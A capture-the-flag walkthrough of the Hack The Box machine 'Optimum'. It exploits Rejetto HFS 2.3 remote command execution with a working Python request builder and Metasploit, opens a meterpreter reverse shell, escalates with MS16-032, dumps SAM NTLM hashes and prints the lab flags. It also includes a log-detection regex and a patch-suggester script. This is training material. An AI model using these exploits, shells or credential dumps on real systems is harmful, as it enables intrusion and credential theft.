A walkthrough of Hack The Box VM "Optimum"

 A quick nmap scan

└─# nmap -A -T4 -p- 10.129.61.255

Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION

80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), 
Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), 
Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), 
Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), 
Microsoft Windows 7 or Windows Server 2008 R2 (85%), 
Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), 
Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)

So, what do we have here? Only one port, and it is a web server:

80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /

Let's ask Google, exploit-db and searchsploit for info. Let's start with searchsploit:

searchsploit HttpFileServer
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command | windows/webapps/49125.py
---------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                
┌──(nx㉿xeon)-[~]
└─$ searchsploit rejetto       
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
Rejetto HTTP File Server (HFS) - Remote Comma | windows/remote/34926.rb
Rejetto HTTP File Server (HFS) 1.5/2.x - Mult | windows/remote/31056.py
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbi | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c | windows/webapps/34852.txt
Rejetto HttpFileServer 2.3.x - Remote Command | windows/webapps/49125.py
---------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                   

There are a couple of suggestions in searchsploit; let's see what Metasploit has.

msf6 > search rejetto

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec

msf6 > 

What about exploit-db? The two Python scripts from searchsploit are there as well:

https://www.exploit-db.com/exploits/39161
https://www.exploit-db.com/exploits/49125

 So we know we're running Windows, most likely Server 2012, and the only exposed service is Rejetto HTTP File Server (HFS) 2.3. We also know there are public exploits for it, both stand-alone scripts and a Metasploit module. They all abuse the same bug (CVE-2014-6287): a null byte in the search parameter gets past HFS's macro filtering, so a {.exec|...} macro supplied in the URL is executed on the server. So let's be lazy and go for MSF.
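Before handing the job to Metasploit, it is worth seeing what the module actually sends, and what the same request looks like from the defender's side. The block below is an added example, not code from the original walkthrough or from the Rejetto project: it builds the single GET request behind the HFS 2.3.x command execution (the same primitive the exploit-db scripts 39161/49125 and the rejetto_hfs_exec module use) and flags that request in access-log lines. The target URL, the command and the log lines are constructed placeholders.

```python
# Added example, not from the original walkthrough or from the Rejetto project:
# the request behind the HFS 2.3.x RCE, plus a log check for it.
import re
import sys
import urllib.parse
import urllib.request


def hfs_exec_url(base_url: str, command: str) -> str:
    """Return the GET URL the public exploits (exploit-db 39161/49125, the
    MSF module) send to HFS 2.3.x.

    The %00 defeats HFS's macro filtering on the search parameter, so the
    {.exec|...} macro that follows it is evaluated server-side.  Only the
    command is percent-encoded; the NUL and the macro delimiters stay literal.
    """
    encoded = urllib.parse.quote(command)  # spaces -> %20, keeps / . - _
    return f"{base_url.rstrip('/')}/?search=%00{{.exec|{encoded}.}}"


def hfs_exec(base_url: str, command: str, timeout: float = 5.0) -> int:
    """Send the request and return the HTTP status.

    The command runs blind: HFS answers 200 whether or not it worked, so
    confirm execution out of band (a ping or a reverse shell to your host).
    """
    with urllib.request.urlopen(hfs_exec_url(base_url, command), timeout=timeout) as resp:
        return resp.status


# Detection side: the same primitive seen from an access log. Matches whether
# the macro braces were sent literally or percent-encoded (%7B is "{").
HFS_MACRO_INJECT = re.compile(r"search=(?:%00|\x00)(?:%7b|\{)\.", re.IGNORECASE)


def flag_hfs_exploit_lines(log_lines):
    """Return only the log lines that carry the null-byte macro injection."""
    return [line for line in log_lines if HFS_MACRO_INJECT.search(line)]


# Constructed sample access-log lines (generic CLF layout, not HFS's own
# format and not taken from the page); the last two are exploit attempts.
SAMPLE_LOG = [
    '10.10.14.33 - - [27/Apr/2021:01:30:01 +0200] "GET / HTTP/1.1" 200 1894',
    '10.10.14.33 - - [27/Apr/2021:01:30:05 +0200] "GET /?search=report HTTP/1.1" 200 312',
    '10.10.14.33 - - [27/Apr/2021:01:31:12 +0200] "GET /?search=%00{.exec|cmd.exe%20/c%20whoami.} HTTP/1.1" 200 0',
    '10.10.14.33 - - [27/Apr/2021:01:31:40 +0200] "GET /?search=%00%7B.exec%7Ccmd.exe.%7D HTTP/1.1" 200 0',
]


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} http://HOST:PORT 'COMMAND'")
    print("URL:", hfs_exec_url(sys.argv[1], sys.argv[2]))
    print("HTTP status:", hfs_exec(sys.argv[1], sys.argv[2]))
```

Because the command runs blind, the public exploits chain it: one request saves a VBS/PowerShell stager to disk, a second one executes it, and the reverse shell coming back to your listener is the confirmation. On the defensive side, a `%00` in any query string is already suspicious on its own; the regex above just narrows it to the HFS macro form.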

msf6 > use exploit/windows/http/rejetto_hfs_exec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > show options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all
                                         addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host

Let's set the options, and try to run the attack.

msf6 exploit(windows/http/rejetto_hfs_exec) > set rhosts 10.129.61.255
rhosts => 10.129.61.255
msf6 exploit(windows/http/rejetto_hfs_exec) > set lhost 10.10.14.33
lhost => 10.10.14.33
msf6 exploit(windows/http/rejetto_hfs_exec) > run

If it works it gives back a connection and drops you into a meterpreter shell, since that was the payload.

meterpreter > getuid
Server username: OPTIMUM\kostas

meterpreter > background
[*] Backgrounding session 1...

So we have a shell running as the kostas user. That's not enough; we want SYSTEM, so how do we get there? One option is the local_exploit_suggester post module, which checks the session against Metasploit's local exploits:

msf6 exploit(windows/http/rejetto_hfs_exec) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester

msf6 exploit(windows/http/rejetto_hfs_exec) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.129.61.255 - Collecting local exploits for x86/windows...

So we let the module do its work and collect a list of local exploits that match the session. When it's done we have a few candidates. Some of them will fail, so run down the list one at a time and see what happens; one of them should work, so patience :)

msf6 exploit(windows/local/bypassuac_eventvwr) > set LHOST 10.10.14.33
LHOST => 10.10.14.33
msf6 exploit(windows/local/bypassuac_eventvwr) > set session 1
session => 1
msf6 exploit(windows/local/bypassuac_eventvwr) > run

[*] Started reverse TCP handler on 10.10.14.33:4444 
[-] Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_eventvwr) > 

So bypassuac_eventvwr failed, and the message tells us why: a UAC bypass only gets a full token for an account that is already in the local Administrators group, and kostas isn't. We need a real privilege escalation, so let's try the next one, MS16-032 (the Secondary Logon handle leak).

msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > show options

Module options (exploit/windows/local/ms16_032_secondary_logon_handle_privesc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.0.13        yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST 10.10.14.33
LHOST => 10.10.14.33
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set session 1
session => 1
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run

[*] Started reverse TCP handler on 10.10.14.33:4444 
[+] Compressed size: 1016
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\eAzNqoy.ps1...
[*] Compressing script contents...
[+] Compressed size: 3596
[*] Executing exploit script...
	 __ __ ___ ___   ___     ___ ___ ___ 
	|  V  |  _|_  | |  _|___|   |_  |_  |
	|     |_  |_| |_| . |___| | |_  |  _|
	|_|_|_|___|_____|___|   |___|___|___|
	                                    
	               [by b33f -> @FuzzySec]

[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 2612

[*] Sniffing out privileged impersonation token..

[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 2564
[+] Resuming thread..

[*] Sniffing out SYSTEM shell..

[>] Duplicating SYSTEM token
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!

GCYHIeZ6ABRvgsxgU7Vr4QXKJJZqtCjp
[+] Executed on target machine.
[*] Sending stage (175174 bytes) to 10.129.61.255
[*] Meterpreter session 2 opened (10.10.14.33:4444 -> 10.129.61.255:49164) at 2021-04-27 01:32:43 +0200
[+] Deleted C:\Users\kostas\AppData\Local\Temp\eAzNqoy.ps1

So it worked, and we get a second meterpreter session back, this time as SYSTEM. Two things worth noting in the output: the module ran its 32-bit payload through SysWOW64 powershell because our session is x86 on an x64 box, and MS16-032 is a race condition, so a run that fails is worth repeating. The getsystem that follows is redundant, since the session is already SYSTEM.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > 

lsa_dump_sam is not a core meterpreter command; it comes from the kiwi (Mimikatz) extension, so run load kiwi first (not shown above). As SYSTEM it dumps the local SAM:

meterpreter > lsa_dump_sam
[+] Running as SYSTEM
[*] Dumping SAM
Domain : OPTIMUM
SysKey : 26abbd282f97155f44e222de59a95a7e
Local SID : S-1-5-21-605891470-2991919448-81205106

SAMKey : 17524c894cca9813298b81f79204ca4f

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: d90b270062e8b9f118ab8e0f733df391

RID  : 000001f5 (501)
User : Guest

RID  : 000003e9 (1001)
User : kostas
  Hash NTLM: fb7c6aab6468ef0383f97a12b78ab8ac

Let's pause here for a moment. What if we can't run the local exploit suggester module because we aren't in Metasploit? There's a stand-alone tool called Windows-Exploit-Suggester: https://github.com/AonCyberLabs/Windows-Exploit-Suggester

Download it, fetch the Microsoft bulletin database with --update, run systeminfo on the Windows host (the Windows command, not meterpreter's sysinfo), copy that output into a file on your Linux host, and run the script with --database <downloaded .xls> --systeminfo <that file>. It compares the installed hotfixes against the bulletins for that OS build and lists the missing patches that have public exploits, which gives you an idea of what local attack vectors are possible.
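To make the workflow concrete, here is a minimal version of what the tool does with that systeminfo dump. It is an added example, not code from the original page or from the Windows-Exploit-Suggester project: it parses the OS name, build, architecture and installed hotfix list out of a constructed systeminfo sample and reports which bulletins from a small table apply to that OS and lack their fix. The bulletin-to-KB table is illustrative and assumed from memory; the real tool works from the full Microsoft spreadsheet it downloads with --update, so verify any KB number there before relying on it.

```python
# Added example, not from the original page or from the Windows-Exploit-Suggester
# project: a minimal re-implementation of what that tool does with a systeminfo
# dump, so the workflow is clear even without the tool.
import re
import sys

# Constructed sample `systeminfo` output (trimmed); not captured from the box.
SAMPLE_SYSTEMINFO = """\
Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2919355
                           [02]: KB2939087
                           [03]: KB3000850
Network Card(s):           1 NIC(s) Installed.
"""

# Illustrative bulletin table (assumption, from memory: verify the KB numbers
# against the spreadsheet the real tool downloads with --update).
# bulletin -> (KB that ships the fix, OS name substring it applies to, note)
BULLETINS = {
    "MS16-032": ("KB3139914", "Windows Server 2012 R2", "Secondary Logon handle leak, SYSTEM"),
    "MS15-051": ("KB3045171", "Windows Server 2012 R2", "win32k ClientCopyImage, SYSTEM"),
    "MS10-092": ("KB2305420", "Windows Server 2008", "Task Scheduler XML, SYSTEM"),
}


def _field(text, label):
    """Value of a 'Label:   value' line, or '' when the label is absent."""
    m = re.search(rf"^{re.escape(label)}:\s*(.+?)\s*$", text, re.MULTILINE)
    return m.group(1) if m else ""


def parse_systeminfo(text):
    """Pull the fields a suggester needs out of English `systeminfo` output.

    Caveat: the labels are localized on non-English Windows; the real tool
    has the same limitation, so collect systeminfo with an English locale.
    """
    return {
        "os_name": _field(text, "OS Name"),
        "os_version": _field(text, "OS Version"),
        "arch": _field(text, "System Type"),
        # "Hotfix(s): N/A" on an unpatched box simply yields an empty set.
        "hotfixes": {kb.upper() for kb in re.findall(r"\[\d+\]:\s*(KB\d+)", text, re.I)},
    }


def suggest(info, bulletins=BULLETINS):
    """Return (bulletin, kb, note) for every bulletin that applies to this OS
    and whose fix is not in the installed-hotfix list, sorted by bulletin."""
    hits = []
    for bulletin, (kb, os_match, note) in bulletins.items():
        if os_match in info["os_name"] and kb.upper() not in info["hotfixes"]:
            hits.append((bulletin, kb, note))
    return sorted(hits)


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SYSTEMINFO
    info = parse_systeminfo(text)
    print(f"{info['os_name']} ({info['arch']}), {len(info['hotfixes'])} hotfixes")
    for bulletin, kb, note in suggest(info):
        print(f"  [*] {bulletin} missing ({kb}): {note}")
```

Run it with the path to a saved systeminfo dump as the only argument, or with no argument to use the embedded sample. The matching is deliberately the same simple rule the real tool uses (OS string match plus "fix KB not installed"), which is also its weakness: a superseding cumulative update that contains the fix under a different KB number shows up as a false positive, so treat the output as a list of things to try, not as proof.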
We didn't need it here, though, so let's go hunt some flags...

meterpreter > cat user.txt.txt
d0c39409d7b994a9a1389ebf38ef5f73

 Directory of c:\Users\Administrator\Desktop

18/03/2017  03:14     <DIR>          .
18/03/2017  03:14     <DIR>          ..
18/03/2017  03:14                 32 root.txt
               1 File(s)          32 bytes
               2 Dir(s)  31.895.547.904 bytes free

c:\Users\Administrator\Desktop>type root.txt    
type root.txt
51ed1b36553c8461f4552c2e92b3eeed
c:\Users\Administrator\Desktop>

So, we're done ;)
